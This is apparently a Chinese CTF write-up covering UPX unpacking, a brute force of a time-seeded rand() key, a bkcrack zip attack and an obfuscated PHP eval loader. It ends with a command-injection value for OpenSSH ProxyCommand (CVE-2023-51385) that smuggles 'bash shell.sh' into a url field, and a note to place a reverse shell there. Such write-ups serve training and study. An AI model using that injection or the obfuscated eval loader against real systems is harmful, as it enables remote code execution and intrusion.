2023年春秋杯网络安全联赛冬季赛 Writeup
re
upx2023
程序加了 UPX 壳，但壳的标志被改过。先把标志修复回来，再脱壳，之后正常分析即可。
# Probe run: give the program a marker input and record what comes back, to
# learn where each input position ends up after its reordering step.
#   input : flag00000000000000000000000000000000000000
#   output: f0000000000lg0000000000000000000a000000000
c1 = 'f0000000000lg0000000000000000000a000000000'
# Print the output position of each marker letter, in input order f, l, a, g.
for marker in 'flag':
    print(c1.index(marker))
# Positions, sorted by index (consistent with a 3-rail rail fence over 42 chars):
# 0 f
# 11 l
# 12 g
# 32 a
爆破 seed
from ctypes import *
import datetime
# The 42 encrypted bytes that the script XORs against the rand() stream
# (presumably lifted from the unpacked binary), one row of 14 per line.
enc = list(bytes.fromhex(
    "0963D9F658DD3F4C0F0B98C66521"
    "41EDC40B3A7BE5755DA93141D752"
    "6C0AFAFDFA84DB89CD7E27851308"
))
def rand_win():
    """Return the next value of rand() from the Windows C runtime (msvcrt)."""
    crt = cdll.msvcrt
    return crt.rand()
def rand_win_ff():
    """Return the next msvcrt rand() value reduced modulo 0xff.

    The result is used by the caller as one keystream value to XOR against
    an encrypted byte.
    """
    raw = cdll.msvcrt.rand()
    return raw % 0xff
def process(seed):
    """Test one candidate srand() seed against the known plaintext letters.

    Re-seeds msvcrt with *seed*, draws 42 values of rand() % 0xff and XORs
    them with ``enc``. The marker probe earlier in the writeup put the
    letters 'f', 'l', 'g', 'a' at output positions 0, 11, 12 and 32, so a
    correct seed has to decode those four positions to exactly those
    letters. The checks are cumulative: each later one only runs after the
    earlier ones matched.

    Prints '1 get' / '2 get' progress lines for partial matches. On a full
    match it prints the seed and ends the interpreter with exit(0).
    """
    cdll.msvcrt.srand(seed)
    keystream = [rand_win_ff() for _ in range(42)]

    def decodes_to(pos, letter):
        # True when the byte at *pos* decrypts to *letter* under this seed.
        return keystream[pos] ^ enc[pos] == ord(letter)

    if not (decodes_to(0, 'f') and decodes_to(11, 'l')):
        return
    print('1 get', seed)
    if not decodes_to(12, 'g'):
        return
    print('2 get', seed)
    if not decodes_to(32, 'a'):
        return
    print('GET ------ ')
    print(seed)
    exit(0)
def bruteforce():
    """Try consecutive integer seeds starting at midnight on 2023-04-22.

    Every candidate goes to process(), which ends the interpreter on the
    first full match, so this function only returns when nothing in the
    range matched.

    The start value suggests the writeup assumes the seed was taken from the
    clock around that date (not confirmed from this script alone). A seed of
    that kind plus four known plaintext letters is all the search needs,
    which is why a clock-seeded rand() stream gives no confidentiality.
    """
    # NOTE(review): a naive datetime makes timestamp() use the local time
    # zone, so the first candidate depends on where the script is run.
    first = int(datetime.datetime(2023, 4, 22).timestamp())
    span = 1054099200
    seed = first
    while seed < first + span:
        process(seed)
        seed += 1
# Start the search when the script runs; process() calls exit(0) on the
# first seed that decodes all four known letters.
bruteforce()
step 3
import sys
from ctypes import *
import datetime
# Same 42 encrypted bytes as in the seed search, written as plain byte values.
enc = [
    0x09, 0x63, 0xD9, 0xF6, 0x58, 0xDD, 0x3F,
    0x4C, 0x0F, 0x0B, 0x98, 0xC6, 0x65, 0x21,
    0x41, 0xED, 0xC4, 0x0B, 0x3A, 0x7B, 0xE5,
    0x75, 0x5D, 0xA9, 0x31, 0x41, 0xD7, 0x52,
    0x6C, 0x0A, 0xFA, 0xFD, 0xFA, 0x84, 0xDB,
    0x89, 0xCD, 0x7E, 0x27, 0x85, 0x13, 0x08,
]
# Seed for the final decryption; presumably the value reported by the seed
# search. Read as a Unix time it is 2023-04-22 06:31:50 UTC.
cdll.msvcrt.srand(1682145110)
def rand_win():
    """Return the next msvcrt rand() value reduced modulo 255 (keystream value)."""
    value = cdll.msvcrt.rand()
    return value % 255
# XOR each encrypted byte with the next keystream value and print the result
# as one unbroken line.
for cipher_byte in enc:
    plain_char = chr(rand_win() ^ cipher_byte)
    print(plain_char, end='')
# Output (still transposed):
# f{52bgb-281lg00ff-46f7-ca009c8e}a381-b7191
# Last step: undo the 3-rail rail fence, e.g. with CyberChef's rail fence
# decode operation, key=3.
Misc
_明文混淆
找一个大小为 35821 的 LICENSE.txt 作为已知明文，
用 bkcrack 做明文攻击，把内容解出来。
<?php
// Obfuscated sample (presumably the file recovered in the previous step).
// Every function name is assembled at runtime from one lookup string, so no
// readable call appears in the source. All of it can be decoded by hand
// without executing anything.
//
// Lookup string after urldecode (42 chars, index 0 = "n"):
//   n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
// Indexes 3,6,33,30 -> "base" (extended to "base64_decode" further down).
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};
// -> "strtr"
$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};
// -> "substr" (reuses the "s" and "t" of the "strtr" string)
$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};
// -> "52", used below as a length/offset.
$OO0000=$O00OO0{7}.$O00OO0{13};
// Appends "64_decode": $O00O0O now holds "base64_decode".
$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
// Stage 1: eval(base64_decode("...")). The decoded text stores a second blob
// in $O0O000 and then evals, prefixed with a PHP closing tag,
//   base64_decode(strtr(substr(blob, 104), substr(blob, 52, 52), substr(blob, 0, 52)))
// so blob chars 52..103 are translated to chars 0..51 (a substitution over
// the base64 alphabet) before the remainder is decoded.
// For analysis, decode both stages offline and print the text rather than
// letting eval run it.
// NOTE: the $str{n} offset syntax is rejected by PHP 8, so the file will not
// even parse there; static decoding is the practical route.
eval($O00O0O("JE8wTzAwMD0idVNxTHlDandXcFpIaGlLbWZGR1ZUQmFOcllvSXpsZWd4Sk1iUkRVRUFrUWN0bnZzZE9QWGladnVUYWdmY0hiWFloZVdNeUtObEx3U2pvQ25ydEFCeE9RRHNKcGRrUG1JekdFVlJVRnFGSjlmd1hrZWJxYllEYVlHQVd0aWJXeFlSS3BDb1d5cmJsbzBxMnN0bzI5UGJaQkdObExHUnlRNEF0T2dzUFNlc2E5THBkc0VEeVJwVVhzZU5kVjRScDVyUjNtNHNkUkZJR0hPSTJ0bmJQdGxTS3oybEdIYkFHSE53Z3k1TlBiTk5QejROV0M1TnJMMElXU2RtcGQ5RlpJSGVaUDdua0MvRkI9PSI7ZXZhbCgnPz4nLiRPMDBPME8oJE8wT08wMCgkT08wTzAwKCRPME8wMDAsJE9PMDAwMCoyKSwkT08wTzAwKCRPME8wMDAsJE9PMDAwMCwkT08wMDAwKSwkT08wTzAwKCRPME8wMDAsMCwkT08wMDAwKSkpKTs="));
?>
随便解下base64即可。
_modules
OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385)附验证方法
照着改一下。
url = ssh://bash shell.sh
foo.example.com/bar
shell.sh中反弹shell即可。